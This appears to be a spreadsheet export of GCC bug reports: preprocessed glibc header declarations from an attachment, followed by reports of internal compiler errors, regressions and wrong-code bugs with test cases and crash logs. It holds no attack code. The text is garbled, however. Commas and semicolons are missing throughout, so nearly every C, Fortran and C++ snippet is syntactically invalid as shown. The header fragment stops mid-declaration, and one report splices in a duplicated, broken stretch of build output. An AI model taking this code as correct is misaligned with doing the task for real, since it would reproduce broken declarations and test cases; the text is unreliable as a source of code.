extern int fflush_unlocked (FILE *__stream) 
extern int fcloseall (void) 
extern FILE *fopen (__const char *__restrict __filename
                    __const char *__restrict __modes) 
extern FILE *freopen (__const char *__restrict __filename
                      __const char *__restrict __modes
                      FILE *__restrict __stream) 
# 231 include/stdio.h 3
extern FILE *fopen64 (__const char *__restrict __filename
                      __const char *__restrict __modes) 
extern FILE *freopen64 (__const char *__restrict __filename
                        __const char *__restrict __modes
                        FILE *__restrict __stream) 
extern FILE *fdopen (int __fd __const char *__modes) 
extern FILE *fopencookie (void *__restrict __magic_cookie
                          __const char *__restrict __modes
                          _IO_cookie_io_functions_t __io_funcs) 
extern FILE *fmemopen (void *__s size_t __len __const char *__modes) 
extern FILE *open_memstream (char **__restrict __bufloc
                             size_t *__restrict __sizeloc) 
extern void setbuf (FILE *__restrict __stream char *__restrict __buf) 
extern int setvbuf (FILE *__restrict __stream char *__restrict __buf
                    int __modes size_t __n) 
extern void setbuffer (FILE *__restrict __stream char *__restrict __buf
                       size_t __size) 
extern void setlinebuf (FILE *__stream) 
extern int fprintf (FILE *__restrict __stream
                    __const char *__restrict __format ...) 
extern int printf (__const char *__restrict __format ...) 
extern int sprintf (char *__restrict __s
                    __const char *__restrict __format ...) 
extern int vfprintf (FILE *__restrict __s __const char *__restrict __format
                     __gnuc_va_list __arg) 
extern int vprintf (__const char *__restrict __format __gnuc_va_list __arg)
extern int vsprintf (char *__restrict __s __const char *__restrict __format
                     __gnuc_va_list __arg) 
extern int snprintf (char *__restrict __s size_t __maxlen
                     __const char *__restrict __format ...)
     __attribute__ ((__format__ (__printf__ 3 4)))
extern int vsnprintf (char *__restrict __s size_t __maxlen
                      __const char *__restrict __format __gnuc_va_list __arg)
     __attribute__ ((__format__ (__printf__ 3 0)))
extern int vasprintf (char **__restrict __ptr __const char *__restrict __f
                      __gnuc_va_list __arg)
     __attribute__ ((__format__ (__printf__ 2 0)))
extern int __asprintf (char **__restrict __ptr
                       __const char *__restrict __fmt ...)
     __attribute__ ((__format__ (__printf__ 2 3)))
extern int asprintf (char **__restrict __ptr
                     __const char *__restrict __fmt ...)
     __attribute__ ((__format__ (__printf__ 2 3)))
extern int vdprintf (int __fd __const char *__restrict __fmt
                     __gnuc_va_list __arg)
     __attribute__ ((__format__ (__printf__ 2 0)))
extern int dprintf (int __fd __const char *__restrict __fmt ...)
     __attribute__ ((__format__ (__printf__ 2 3)))
extern int fscanf (FILE *__restrict __stream
                   __const char *__restrict __format ...) 
extern int scanf (__const char *__restrict __format ...) 
extern int sscanf (__const char *__restrict __s
                   __const char *__restrict __format ...) 
extern int vfscanf (FILE *__restrict __s __const char *__restrict __format
                    __gnuc_va_list __arg)
     __attribute__ ((__format__ (__scanf__ 2 0)))
extern int vscanf (__const char *__restrict __format __gnuc_va_list __arg)
     __attribute__ ((__format__ (__scanf__ 1 0)))
extern int vsscanf (__const char *__restrict __s
                    __const char *__restrict __format __gnuc_va_list __arg)
     __attribute__ ((__format__ (__scanf__ 2 0)))
extern int fgetc (FILE *__stream) 
extern int getc (FILE *__stream) 
extern int getchar (void) 
extern int getc_unlocked (FILE *__stream) 
extern int getchar_unlocked (void) 
extern int fgetc_unlocked (FILE *__stream) 
extern int fputc (int __c FILE *__stream) 
extern int putc (int __c FILE *__stream) 
extern int putchar (int __c) 
extern int fputc_unlocked (int __c FILE *__stream) 
extern int putc_unlocked (int __c FILE *__stream) 
extern int putchar_unlocked (int __c) 
extern int getw (FILE *__stream) 
extern int putw (int __w FILE *__stream) 
extern char *fgets (char *__restrict __s int __n FILE *__restrict __stream)
extern char *fgets_unlocked (char *__restrict __s int __n
                             FILE *__restrict __stream) 
extern char *gets (char *__s) 
# 435 include/stdio.h 3
extern __ssize_t __getdelim (char **__restrict __lineptr
                               size_t *__restrict __n int __delimiter
                               FILE *__restrict __stream) 
extern __ssize_t getdelim (char **__restrict __lineptr
                             size_t *__restrict __n int __delimiter
                             FILE *__restrict __stream) 
extern __ssize_t getline (char **__restrict __lineptr
                            size_t *__restrict __n
                            FILE *__restrict __stream) 
extern int fputs (__const char *__restrict __s FILE *__restrict __stream)
extern int fputs_unlocked (__const char *__restrict __s
                           FILE *__restrict __stream) 
extern int puts (__const char *__s) 
extern int ungetc (int __c FILE *__stream) 
extern size_t fread (void *__restrict __ptr size_t __size
                     size_t __n FILE *__restrict __stream) 
extern size_t fwrite (__const void *__restrict __ptr size_t __size
                      size_t __n FILE *__restrict __s) 
extern size_t fread_unlocked (void *__restrict __ptr size_t __size
                              size_t __n FILE *__restrict __stream) 
extern size_t fwrite_unlocked (__const void *__restrict __ptr size_t __size
                               size_t __n FILE *__restrict __stream) 
extern int fseek (FILE *__stream long int __off int __whence) 
extern long int ftell (FILE *__stream) 
extern void rewind (FILE *__stream) 
# 498 include/stdio.h 3
extern int fseeko (FILE *__stream __off_t __off int __whence) 
extern __off_t ftello (FILE *__stream) 
extern int fgetpos (FILE *__restrict __stream fpos_t *__restrict __pos)
extern int fsetpos (FILE *__stream __const fpos_t *__pos) 
# 532 include/stdio.h 3
extern int fseeko64 (FILE *__stream __off64_t __off int __whence) 
extern __off64_t ftello64 (FILE *__stream) 
extern int fgetpos64 (FILE *__restrict __stream fpos64_t *__restrict __pos)
extern int fsetpos64 (FILE *__stream __const fpos64_t *__pos) 
extern void clearerr (FILE *__stream) 
extern int feof (FILE *__stream) 
extern int ferror (FILE *__stream) 
extern void clearerr_unlocked (FILE *__stream) 
extern int feof_unlocked (FILE *__stream) 
extern int ferror_unlocked (FILE *__stream) 
extern void perror (__const char *__s) 
extern int sys_nerr
extern __const char *__const sys_errlist[]
extern int _sys_nerr
extern __const char *__const _sys_errlist[]
extern int fileno (FILE *__stream) 
extern int fileno_unlocked (FILE *__stream) 
extern FILE *popen (__const char *__command __const char *__modes) 
extern int pclose (FILE *__stream) 
extern char *ctermid (char *__s) 
extern char *cuserid (char *__s) 
struct obstack
extern int obstack_printf (struct obstack *__restrict __obstack
                           __const char *__restrict __format ...) 
extern int obstack_vprintf (struct obstack *__restrict __obstack
                            __const char *__restrict __format
                            __gnuc_va_list __args) 
extern void flockfile (FILE *__stream) 
extern int ftrylockfile (FILE *__stream) 
extern void funlockfile (FILE *__stream) 
# 639 include/stdio.h 3
# 1 /usr/include/bits/stdio.h 1 3
# 33 /usr/include/bits/stdio.h 3
extern __inline int
vprintf (__const char *__restrict __fmt __gnuc_va_list __arg)
{
  return vfprintf (stdout __fmt __arg)
}
extern __inline int
getchar (void)
{
  return _IO_getc (stdin)
}
extern __inline int
getc_unlocked (FILE *__fp)
{
  return ((__fp)-&gt;_IO_read_ptr &gt;= (__fp)-&gt;_IO_read_end ? __uflow (__fp) : *(unsigned char *) (__fp)-&gt;_IO_read_ptr++)
}
extern __inline int
getchar_unlocked (void)
{
  return ((stdin)-&gt;_IO_read_ptr &gt;= (stdin)-&gt;_IO_read_end ? __uflow (stdin) : *(unsigned char *) (stdin)-&gt;_IO_read_ptr++)
}
extern __inline int
putchar (int __c)
{
  return _IO_putc (__c stdout)
}
extern __inline int
fputc_unlocked (int __c FILE *__stream)
{
  return (((__stream)-&gt;_IO_write_ptr &gt;= (__stream)-&gt;_IO_write_end) ? __overflow (__stream (unsigned char) (__c)) : (unsigned char) (*(__stream)-&gt;_IO_write_ptr++ = (__c)))
}
extern __inline int
putc_unlocked (int __c FILE *__stream)
{
  return (((__stream)-&gt;_IO_write_ptr &gt;= (__stream)-&gt;_IO_write_end) ? __overflow (__stream (unsigned char) (__c)) : (unsigned char) (*(__stream)-&gt;_IO_write_ptr++ = (__c)))
}
extern __inline int
putchar_unlocked (int __c)
{
  return (((stdout)-&gt;_IO_write_ptr &gt;= (stdout)-&gt;_IO_write_end) ? __overflow (stdout (unsigned char) (__c)) : (unsigned char) (*(stdout)-&gt;_IO_write_ptr++ = (__c)))
}
extern __inline __ssize_t
getline (char **__lineptr size_t *__n FILE *__stream)
{
  return __getdelim (__lineptr __n '\n' __stream)
}
extern __inline int
feof_unlocked (FILE *__stream)
{
  return (((__stream)-&gt;_flags 
}
extern __inline int
ferror_unlocked (FILE *__stream)
{
  return (((__stream)-&gt;_flags 
}
# 640 include/stdio.h 2 3
# 65 /share1/gcc-dev/gcc/gcc/tsystem.h 2
# 1 /usr/include/sys/types.h 1 3
# 28 /usr/include/sys/types.h 3
typedef __u_char u_char
typedef __u_short u_short
typedef __u_int u_int
typedef __u_long u_long
typedef __quad_t quad_t
typedef __u_quad_t u_quad_t
typedef __fsid_t fsid_t
typedef __loff_t loff_t
typedef __ino_t ino_t
typedef __ino64_t ino64_t
typedef __dev_t dev_t
typedef __gid_t gid_t
typedef __mode_t mode_t
typedef __nlink_t nlink_t
typedef __uid_t uid_t
typedef __off_t off_t
typedef __off64_t off64_t
typedef __pid_t pid_t
typedef __id_t id_t
typedef __ssize_t ssize_t
typedef __daddr_t daddr_t
typedef __caddr_t caddr_t
typedef __key_t key_t
# 132 /usr/include/sys/types.h 3
# 1 /usr/include/time.h 1 3
# 59 /usr/include/time.h 3
typedef __clock_t clock_t
# 70 /usr/include/time.h 3
typedef __time_t time_t
# 82 /usr/include/time.h 3
typedef __clockid_t clockid_t
# 94 /usr/include/time.h 3
typedef __timer_t timer_t
# 133 /usr/include/sys/types.h 2 3
typedef __useconds_t useconds_t
typedef __suseconds_t suseconds_t
# 1 include/stddef.h 1 3
# 147 /usr/include/sys/types.h 2 3
typedef unsigned long int ulong
typedef unsigned short int ushort
typedef unsigned int uint
# 190 /usr/include/sys/types.h 3
typedef int int8_t __attribute__ ((__mode__ (__QI__)))
typedef int int16_t __attribute__ ((__mode__ (__HI__)))
typedef int int32_t __attribute__ ((__mode__ (__SI__)))
typedef int int64_t __attribute__ ((__mode__ (__DI__)))
typedef unsigned int u_int8_t __attribute__ ((__mode__ (__QI__)))
typedef unsigned int u_int16_t __attribute__ ((__mode__ (__HI__)))
typedef unsigned int u_int32_t __attribute__ ((__mode__ (__SI__)))
typedef unsigned int u_int64_t __attribute__ ((__mode__ (__DI__)))
typedef int register_t __attribute__ ((__mode__ (__word__)))
# 212 /usr/include/sys/types.h 3
# 1 /usr/include/endian.h 1 3
# 37 /usr/include/endian.h 3
# 1 /usr/include/bits/endian.h 1 3
# 38 /usr/include/endian.h 2 3
# 213 /usr/include/sys/types.h 2 3
# 1 /usr/include/sys/select.h 1 3
# 31 /usr/include/sys/select.h 3
# 1 /usr/include/bits/select.h 1 3
# 32 /usr/include/sys/select.h 2 3
# 1 /usr/include/bits/sigset.h 1 3
# 23 /usr/include/bits/sigset.h 3
typedef int __sig_atomic_t
typedef struct
  {
    unsigned long int __val[(1024 / (8 * sizeof (unsigned long int)))]
  } __sigset_t
# 35 /usr/include/sys/select.h 2 3
typedef __sigset_t sigset_t
# 1 /usr/include/time.h 1 3
# 106 /usr/include/time.h 3
struct timespec
  {
    __time_t tv_sec
    long int tv_nsec
  }
# 45 /usr/include/sys/select.h 2 3
# 1 /usr/include/bits/time.h 1 3
# 67 /usr/include/bits/time.h 3
struct timeval
  {
    __time_t tv_sec
    __suseconds_t tv_usec
  }
# 47 /usr/include/sys/select.h 2 3
# 55 /usr/include/sys/select.h 3
typedef long int __fd_mask
typedef struct
  {
    __fd_mask fds_bits[1024 / (8 * sizeof (__fd_mask))]
  } fd_set
typedef __fd_mask fd_mask
# 95 /usr/include/sys/select.h 3
extern int select (int __nfds fd_set *__restrict __readfds
                   fd_set *__restrict __writefds
                   fd_set *__restrict __exceptfds
                   struct timeval *__restrict __timeout) 
extern int pselect (int __nfds fd_set *__restrict __readfds
                    fd_set *__restrict __writefds
                    fd_set *__restrict __exceptfds
                    const struct timespec *__restrict __timeout
                    const __sigset_t *__restrict __sigmask) 
# 216 /usr/include/sys/types.h 2 3
# 1 /usr/include/sys/sysmacros.h 1 3
# 23 /usr/include/sys/sysmacros.h 3
# 1 /usr/include/bits/wordsize.h 1 3
# 24 /usr/include/sys/sysmacros.h 2 3
# 219 /usr/include/sys/types.h 2 3
typedef __blksize_t blksize_t
typedef __blkcnt_t blkcnt_t
typedef __fsblkcnt_t fsblkcnt_t
typedef __fsfilcnt_t fsfilcnt_t
# 257 /usr/include/sys/types.h 3
typedef __blkcnt64_t blkcnt64_t
typedef __fsblkcnt64_t fsblkcnt64_t
typedef __fsfilcnt64_t fsfilcnt64_t
# 68 /share1/gcc-dev/gcc/gcc/tsystem.h 2
# 1 /usr/include/errno.h 1 3
# 32 /usr/include/errno.h 3
# 1 /usr/include/bits/errno.h 1 3
# 25 /usr/include/bits/errno.h 3
# 1 /usr/include/linux/errno.h 1 3
# 1 /usr/include/asm/errno.h 1 3
# 11 /usr/include/asm/errno.h 3
# 1 /usr/include/asm-sparc/errno.h 1 3
# 12 /usr/include/asm/errno.h 2 3
# 5 /usr/include/linux/errno.h 2 3
# 26 /usr/include/bits/errno.h 2 3
# 36 /usr/include/bits/errno.h 3
extern int errno
extern int *__errno_location (void) __attribute__ ((__const__))
# 37 /usr/include/errno.h 2 3
# 55 /usr/include/errno.h 3
extern char *program_invocation_name *program_invocation_short_name
# 69 /usr/include/errno.h 3
typedef int error_t
# 71 /share1/gcc-dev/gcc/gcc/tsystem.h 2
# 1 /usr/include/string.h 1 3
# 28 /usr/include/string.h 3
# 1 include/stddef.h 1 3
# 34 /usr/include/string.h 2 3
extern void *memcpy (void *__restrict __dest
                     __const void *__restrict __src size_t __n) 
extern void *memmove (void *__dest __const void *__src size_t __n)
extern void *memccpy (void *__restrict __dest __const void *__restrict __src
                      int __c size_t __n)
extern void *memset (void *__s int __c size_t __n) 
extern int memcmp (__const void *__s1 __const void *__s2 size_t</t>
  </si>
  <si>
    <t>GCC-36618</t>
  </si>
  <si>
    <t>gcc-4.4-20080620 ICE in gcj/gnu.CORBA.OrbFunctional</t>
  </si>
  <si>
    <t>bootstrap failure when building gcc-4.4-20080620.
Did NOT happen with gcc-4.4-20080613.  Let
me know if you want more details.
/bin/sh ./libtool --tag=GCJ --mode=compile /usr/local/gcc-4.4-20080620/src/obj-x86_64-Linux-fc8/gcc/gcj -B/usr/local/gcc-4.4-20080620/src/obj-x86_64-Linux-fc8/x86_64-unknown-linux-gnu/32/libjava/ -B/usr/local/gcc-4.4-20080620/src/obj-x86_64-Linux-fc8/gcc/ -ffloat-store -fomit-frame-pointer -fclasspath= -fbootclasspath=/usr/local/gcc-4.4-20080620/src/gcc-4.4-20080620/libjava/classpath/lib --encoding=UTF-8 -Wno-deprecated -fbootstrap-classes -g -O2  -m32 -fsource-filename=/usr/local/gcc-4.4-20080620/src/obj-x86_64-Linux-fc8/x86_64-unknown-linux-gnu/32/libjava/classpath/lib/classes -fjni -findirect-dispatch -fno-indirect-classes -c -o
gnu-CORBA.lo @gnu-CORBA.list
libtool: compile:  /usr/local/gcc-4.4-20080620/src/obj-x86_64-Linux-fc8/gcc/gcj
-B/usr/local/gcc-4.4-20080620/src/obj-x86_64-Linux-fc8/x86_64-unknown-linux-gnu/32/libjava/ -B/usr/local/gcc-4.4-20080620/src/obj-x86_64-Linux-fc8/gcc/ -ffloat-store -fomit-frame-pointer -fclasspath= -fbootclasspath=/usr/local/gcc-4.4-20080620/src/gcc-4.4-20080620/libjava/classpath/lib --encoding=UTF-8 -Wno-deprecated
-fbootstrap-classes -g -O2 -m32 -fsource-filename=/usr/local/gcc-4.4-20080620/src/obj-x86_64-Linux-fc8/x86_64-unknown-linux-gnu/32/libjava/classpath/lib/classes -fjni -findirect-dispatch -fno-indirect-classes -c @gnu-CORBA.list  -fPIC -o .libs/gnu-CORBA.o
/usr/local/gcc-4.4-20080620/src/gcc-4.4-20080620/libjava/classpath/gnu/CORBA/OrbFunctional.java: In class 'gnu.CORBA.OrbFunctional':
/usr/local/gcc-4.4-20080620/src/gcc-4.4-20080620/libjava/classpath/gnu/CORBA/OrbFunctional.java: In method 'gnu.CORBA.OrbFunctional.serveStep(java.net.Socketbo620/src/gcc-4.4-20080620/libjava/classpath/lib --encoding=UTF-8 -Wno-deprecated
-fbootstrap-classes -g -O2 -m32 -fsource-filename=/usr/local/gcc-4.4-20080620/src/obj-x86_64-Linux-fc8/x86_64-unknown-linux-gnu/32/libjava/classpath/lib/classes -fjni -findirect-dispatch -fno-indirect-classes -c @gnu-CORBA.list  -fPIC -o .libs/gnu-CORBA.o
/usr/local/gcc-4.4-20080620/src/gcc-4.4-20080620/libjava/classpath/gnu/CORBA/OrbFunctional.java: In class 'gnu.CORBA.OrbFunctional':
/usr/local/gcc-4.4-20080620/src/gcc-4.4-20080620/libjava/classpath/gnu/CORBA/OrbFunctional.java: In method 'gnu.CORBA.OrbFunctional.serveStep(java.net.Socketboolean)':
In file included from :4:
/usr/local/gcc-4.4-20080620/src/gcc-4.4-20080620/libjava/classpath/gnu/CORBA/OrbFunctional.java:0: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[5]: *** [gnu-CORBA.lo] Error 1
make[5]: Leaving directory `/usr/local/gcc-4.4-20080620/src/obj-x86_64-Linux-fc8/x86_64-unknown-linux-gnu/32/libjava'
make[4]: *** [all-recursive] Error 1
make[4]: Leaving directory `/usr/local/gcc-4.4-20080620/src/obj-x86_64-Linux-fc8/x86_64-unknown-linux-gnu/32/libjava'
make[3]: *** [multi-do] Error 1</t>
  </si>
  <si>
    <t>mariah.lenox</t>
  </si>
  <si>
    <t>GCC-25587</t>
  </si>
  <si>
    <t>[4.1/4.2 Regression] Garbage in output of -fdump-tree-original</t>
  </si>
  <si>
    <t>Given this input as an example:
cat enderr.f90
program test
   character(len=10) :: str
   str = '123'
   read( str * end=10 ) ix
10 continue
   print*i x
end program test
gfortran -fdump-tree-original gives the following with two garbage characters right after the __st_parameter_dtquire as shown below:
MAIN__ ()
{
  real4 x
  char str[1:10]
  int4 i
  _gfortran_copy_string (10 
  {
    struct __st_parameter_dtquireZ dt_parm.0
    dt_parm.0.common.filename = enderr.f90
    dt_parm.0.common.line = 4
    dt_parm.0.internal_unit = 
    dt_parm.0.internal_unit_len = 10
    dt_parm.0.internal_unit_desc = 0B
    dt_parm.0.common.unit = 0
    dt_parm.0.common.flags = 16520
    _gfortran_st_read (
    _gfortran_transfer_integer (
    _gfortran_transfer_real (
    _gfortran_st_read_done (
    switch (dt_parm.0.common.flags &amp; 3)
      {
        case 2:
        goto __label_000010
      }
  }
--- snip ---</t>
  </si>
  <si>
    <t>GCC-48204</t>
  </si>
  <si>
    <t>[4.5 Regression] ICE: in decimal_to_decnumber at dfp.c:115 with -fno-tree-ccp -fno-tree-dominator-opts -fno-tree-fre -g</t>
  </si>
  <si>
    <t>Created attachment 23724
reduced testcase
Compiler output:
$ gcc -O -fno-tree-ccp -fno-tree-dominator-opts -fno-tree-fre -g testcase.c
testcase.c: In function 'foo':
testcase.c:5:1: internal compiler error: in decimal_to_decnumber at dfp.c:113
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Tested revisions:
r171179 - crash
4.6 r170955 - crash
4.5 r170955 - crash
4.4 r170955 - OK</t>
  </si>
  <si>
    <t>GCC-24999</t>
  </si>
  <si>
    <t>[4.0.2 regression] symbol lookup failure</t>
  </si>
  <si>
    <t>Running
gcj -C org/eclipse/jdt/internal/compiler/lookup/LocalTypeBinding.java
in the attached test code results in
./org/eclipse/jdt/internal/compiler/lookup/TagBits.java: In class 'org.eclipse.jdt.internal.compiler.lookup.LocalTypeBinding':
./org/eclipse/jdt/internal/compiler/lookup/TagBits.java: In constructor '(org.eclipse.jdt.internal.compiler.lookup.ClassScopeorg.eclipse.jdt.internal.compiler.lookup.SourceTypeBindingorg.eclipse.jdt.internal.compiler.ast.CaseStatement)':
./org/eclipse/jdt/internal/compiler/lookup/TagBits.java:20: error: Undefined variable or class name: 'ASTNode.Bit3'.
        final int IsNestedType = ASTNode.Bit3
                                    ^
1 error
ASTNode.Bit3 is defined though and the same command on the same code works with 4.0.1.</t>
  </si>
  <si>
    <t>GCC-45384</t>
  </si>
  <si>
    <t>[OOP] double free with SELECT TYPE</t>
  </si>
  <si>
    <t>The attached and rather innocuous looking code generates the subject error.
It is a simplified version of a much more complex test case (in which the select type is entered within a loop and the error shows up at the second iteration) 
===========================================================================
[sfilippo@localhost bug20]$ gfortran -v
Using built-in specs.
COLLECT_GCC=gfortran
COLLECT_LTO_WRAPPER=/usr/local/gnu46/libexec/gcc/x86_64-unknown-linux-gnu/4.6.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../gcc/configure --prefix=/usr/local/gnu46 --enable-languages=cc++fortran
Thread model: posix
gcc version 4.6.0 20100823 (experimental) (GCC) 
[sfilippo@localhost bug20]$ gfortran -o bug20 bug20.f90
[sfilippo@localhost bug20]$ ./bug20 
 NV =           10
*** glibc detected *** ./bug20: double free or corruption (fasttop): 0x00000000018d8ae0 ***
======= Backtrace: =========
/lib64/libc.so.6[0x3381475676]
./bug20[0x400b53]
./bug20[0x400b91]
/lib64/libc.so.6(__libc_start_main+0xfd)[0x338141ec5d]
./bug20[0x4007a9]
======= Memory map: ========
00400000-00401000 r-xp 00000000 08:09 983344                             /home/sfilippo/NUMERICAL/NewPSBLAS/GNUbugs/bug20/bug20
00601000-00602000 rw-p 00001000 08:09 983344                             /home/sfilippo/NUMERICAL/NewPSBLAS/GNUbugs/bug20/bug20
018d8000-018f9000 rw-p 00000000 00:00 0                                  [heap]
3381000000-338101e000 r-xp 00000000 08:06 4964354                        /lib64/ld-2.12.so
338121e000-338121f000 r--p 0001e000 08:06 4964354                        /lib64/ld-2.12.so
338121f000-3381220000 rw-p 0001f000 08:06 4964354                        /lib64/ld-2.12.so
3381220000-3381221000 rw-p 00000000 00:00 0 
3381400000-3381575000 r-xp 00000000 08:06 4964358                        /lib64/libc-2.12.so
3381575000-3381775000 ---p 00175000 08:06 4964358                        /lib64/libc-2.12.so
3381775000-3381779000 r--p 00175000 08:06 4964358                        /lib64/libc-2.12.so
3381779000-338177a000 rw-p 00179000 08:06 4964358                        /lib64/libc-2.12.so
338177a000-338177f000 rw-p 00000000 00:00 0 
3381800000-3381883000 r-xp 00000000 08:06 4964404                        /lib64/libm-2.12.so
3381883000-3381a82000 ---p 00083000 08:06 4964404                        /lib64/libm-2.12.so
3381a82000-3381a83000 r--p 00082000 08:06 4964404                        /lib64/libm-2.12.so
3381a83000-3381a84000 rw-p 00083000 08:06 4964404                        /lib64/libm-2.12.so
3382c00000-3382cf1000 r-xp 00000000 08:06 5092887                        /usr/lib64/libgfortran.so.3.0.0
3382cf1000-3382ef1000 ---p 000f1000 08:06 5092887                        /usr/lib64/libgfortran.so.3.0.0
3382ef1000-3382ef3000 rw-p 000f1000 08:06 5092887                        /usr/lib64/libgfortran.so.3.0.0
3382ef3000-3382ef4000 rw-p 00000000 00:00 0 
3385000000-3385016000 r-xp 00000000 08:06 4964412                        /lib64/libgcc_s-4.4.4-20100630.so.1
3385016000-3385215000 ---p 00016000 08:06 4964412                        /lib64/libgcc_s-4.4.4-20100630.so.1
3385215000-3385216000 rw-p 00015000 08:06 4964412                        /lib64/libgcc_s-4.4.4-20100630.so.1
7f7a0b89c000-7f7a0b8a0000 rw-p 00000000 00:00 0 
7f7a0b8d0000-7f7a0b8d1000 rw-p 00000000 00:00 0 
7fffc443b000-7fffc4450000 rw-p 00000000 00:00 0                          [stack]
7fffc4563000-7fffc4564000 r-xp 00000000 00:00 0                          [vdso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0                  [vsyscall]
Abortito (core dumped)</t>
  </si>
  <si>
    <t>GCC-28849</t>
  </si>
  <si>
    <t>Missed array shape violation with RESHAPE despite -fbounds-check</t>
  </si>
  <si>
    <t>The assignment of a RESHAPE()d array does not trigger
a run-time error with bounds-checking turned on.
% gfortran -O0 -g -fbounds-check gfcbug39_bounds_check.f90 &amp;&amp; ./a.out
 Assignments with correct shapes after RESHAPE...
 a(:1) =   1.000000    
 b(:1) =   1.000000       2.000000    
 ...and with wrong shape (should fail with bounds checking on)
 a(:1) =   1.000000    
 b(:1) =   1.000000       2.000000    
 Must have missed an array bound violation after RESHAPE...
See the attached sample program for details.
Cheers
-ha</t>
  </si>
  <si>
    <t>GCC-30036</t>
  </si>
  <si>
    <t>ICE using interfaces: Assert_Failure sem_util.adb:1033</t>
  </si>
  <si>
    <t>$ gcc -c e.ads
+===========================GNAT BUG DETECTED==============================+
| 4.3.0 20061128 (experimental) (i686-pc-linux-gnu) Assert_Failure sem_util.adb:1033|
| Error detected at d.ads:3:9 [e.ads:3:1]                                  |
| Please submit a bug report see http://gcc.gnu.org/bugs.html.            |
| Use a subject line meaningful to you and us to track the bug.            |
| Include the entire contents of this bug box in the report.               |
| Include the exact gcc or gnatmake command that you entered.              |
| Also include sources listed below in gnatchop format                     |
| (concatenated together with no headers between files).                   |
+==========================================================================+
Please include these source files with error report
Note that list may not be accurate in some cases
so please double check that the problem can still
be reproduced with the set of files listed.
e.ads
c.ads
b.ads
d.ads
compilation abandoned
-- chop here --
package B is
   type I is interface
   procedure P (X : I) is abstract
end
with B
package C is
   type J is new B.I with private
   overriding procedure P (X : J)
private
   type J is new B.I with null record
end
with C
generic
   type G is new C.J with private
package D is
   type H is new G with null record
end
with C
with D
package E is new D (C.J)</t>
  </si>
  <si>
    <t>GCC-11349</t>
  </si>
  <si>
    <t>JNDI URL context factories not located correctly</t>
  </si>
  <si>
    <t>In JNDI you can set the property java.naming.factory.url.pkgs (usually
referenced as javax.naming.Context.URL_PKG_PREFIXES) to point to a package that
can create URL context factories.  For example if java.naming.factory.url.pkgs
was set to com.redhat.foo then URLs starting in bar: would be handled by
contexts created by the class com.redhat.foo.bar.barURLContextFactory.
libgcj is looking in the wrong place for these factories: in the above example
it would look in com.redhat.foo.barURLContextFactory.  The attached patch fixes.</t>
  </si>
  <si>
    <t>GCC-33142</t>
  </si>
  <si>
    <t>[4.1 Regression] wrong code with VRP through ABS_EXPR</t>
  </si>
  <si>
    <t>[ forwarded from http://bugs.debian.org/429657 ]
hueffner@ipc710:/tmp% cat test.c
int abs(int j)
void abort(void)
__attribute__((noinline)) int lisp_atan2(long dy long dx) {
    if (dx &lt;= 0)
        if (dy &gt; 0)
            return abs(dx) &lt;= abs(dy)
    return 0
}
int main() {   
    volatile long dy = 63 dx = -77
    if (lisp_atan2(dy dx))
        abort()
    return 0
}
hueffner@ipc710:/tmp% gcc-4.1 -O1 test.c &amp;&amp; ./a.out 
hueffner@ipc710:/tmp% gcc-4.1 -O2 test.c &amp;&amp; ./a.out 
zsh: abort      ./a.out
not reproducible on alpha or amd64 or with 4.2.</t>
  </si>
  <si>
    <t>GCC-45401</t>
  </si>
  <si>
    <t>[C++0x] reference collapsing and reference qualifiers</t>
  </si>
  <si>
    <t>Based on the wording in FCD 14882 (WG21 N3092) reference collapsing preserves
the target type in the case where an attempt is made to create an rvalue
reference to a reference. The standard does not include reference qualifiers--
such as __restrict__ or (for the SPU port) __ea--however.
In the following code rvrefToRestrictLvref should have the same type as
restrictLvref based on 8.3.2 [dcl.ref] paragraph 6:
   If a typedef (7.1.3) a type template-parameter (14.3.1) or a decltype-
   specifier (7.1.6.2) denotes a type TR that is a reference to a type T an
   attempt to create the type lvalue reference to cv TR creates the type
   lvalue reference to T while an attempt to create the type rvalue
   reference to cv TR creates the type TR.
The following test case demonstrates that GCC is finding the type to be
'int  that is the __restrict is gone and the two typedefs fail to denote
the same type.
The test case is meant to compile clean.
### Self-contained source (dataa.cpp):
typedef int 
typedef restrictLvref 
typedef restrictLvref rvrefToRestrictLvref
### Command to reproduce:
g++ -std=gnu++0x -c dataa.cpp
### Compiler output:
dataa.cpp:3:23: error: conflicting declaration 'typedef int&amp; __restrict__ rvrefToRestrictLvref'
dataa.cpp:2:25: error: 'rvrefToRestrictLvref' has a previous declaration as 'typedef int&amp; rvrefToRestrictLvref'
### g++ -v output:
Using built-in specs.
Target: powerpc64-unknown-linux-gnu
Configured with: ../gcc-4.5.0/configure --prefix=/data/gcc
--program-suffix=-4.5.0 --disable-libssp --disable-libgcj
--enable-version-specific-runtime-libs --with-cpu=default32 --enable-secureplt
--with-long-double-128 --enable-shared --enable-__cxa_atexit
--enable-threads=posix --enable-languages=cc++fortran
Thread model: posix
gcc version 4.5.0 (GCC)</t>
  </si>
  <si>
    <t>GCC-21364</t>
  </si>
  <si>
    <t>[4.0/4.1 regression] [translation] %J in translation instead of %H causes ICE in de.po</t>
  </si>
  <si>
    <t>&gt; [de.po]
&gt; #: tree-ssa.c:1379
&gt; msgid %H%qD is used uninitialized in this function
&gt; msgstr %J%qD wird in dieser Funktion uninitialisiert verwendet
The %J causes gcc to segfault. Changing it to %H fixes everything obviously.
Besides the `q' modifier in %qD doesn't seem to be honoured in the translated
string (same for % which are only interpreted in the original english
string).
I fixed up tons of lines some days ago myself I found a bunch of entries where
the fuzzy selector picked a wrong translation and I've probably overlooked some.
If someone is interested...?
I don't know to do exactly (so please don't shoot me) it seems someone has
written some sort of script to check that the dynamic parameters are the same in
both message strings.</t>
  </si>
  <si>
    <t>GCC-32089</t>
  </si>
  <si>
    <t>Winline reports bogus warning</t>
  </si>
  <si>
    <t>CircularlyReferenceable.cc:76: error: called from here
/usr/local/lib/gcc/alphaev56-unknown-linux-gnu/4.3.0/../../../../
include/c++/4.3.0/bits/stl_multiset.h:91: error: 
inlining failed in call to 'std::multiset&lt;const 
PatternDriver::CircularlyReferenceable* 
std::less 
std::allocator &gt;::
~multiset()': call is unlikely
CircularlyReferenceable.cc:76: error: called from here
gmake: *** [CircularlyReferenceable.o] Error 1
This error (actually a warning) makes no sense: how can a destructor call be 
unlikely? What does that mean? I suspect that the warning is badly worded. What
is intended here?
Also multiset is in the STL and Winline should not be reporting against it.
alpha1:gcc&gt;uname -a
